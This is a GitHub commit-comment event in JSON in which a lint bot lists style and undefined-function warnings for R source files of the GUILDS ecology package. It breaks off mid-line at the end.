{"id":"4601330243","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19127221,"position":null,"line":null,"path":null,"commit_id":"d479751f14be8dd7e0464597dd8bcd6ac8779778","created_at":"2016-09-22T09:28:16Z","updated_at":"2016-09-22T09:28:16Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                ^\n```\n[R/Condition.R:23:49:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                                                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:61:18:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:61:54:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:74:19:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L74) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_left_x  <- evaluateCondLik(eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:76:19:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_right_x <- evaluateCondLik(1 - eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:81:16:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:89:16:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:97:15:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L114) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L114) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:119:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L119) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:124:54:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\") \n                                                     ^\n```\n[R/Condition.R:129:50:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L129) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\",\"\\n\")\n                                                 ^\n```\n[R/Condition.R:138:9:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L138) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:138:9:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L138) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:141:23:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L141) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:141:23:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L141) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:147:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:154:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L154) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:167:9:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L167) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:14:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:171:14:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L171) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L176) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L176) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L176) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:46:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L176) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L181) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:202:17:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:210:10:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L210) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:210:18:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:211:4:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:213:10:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L213) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​    x <- subplex(initVals, g)\n         ^~~~~~~\n```\n[R/Condition.R:213:18:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/Condition.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- subplex(initVals, g)\n                 ^~~~~~~~\n```\n[R/drawLocal.R:2:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:2:2:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n ^\n```\n[R/drawLocal.R:2:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n          ~^~~\n```\n[R/drawLocal.R:2:32:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                               ^~\n```\n[R/drawLocal.R:2:49:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                ^~\n```\n[R/drawLocal.R:2:59:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                         ~^~\n```\n[R/drawLocal.R:2:62:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                             ^~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres <- rep(0, length(k1))\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:3:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tres <- rep(0, length(k1))\n           ~^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:5:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n            ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk <- k1[cnt]\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n                    ~^~~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:11:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n                    ~^~~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:12:9:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n                  ~^~~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax < (y0 + 1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- 0\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:19:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n                            ~^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = 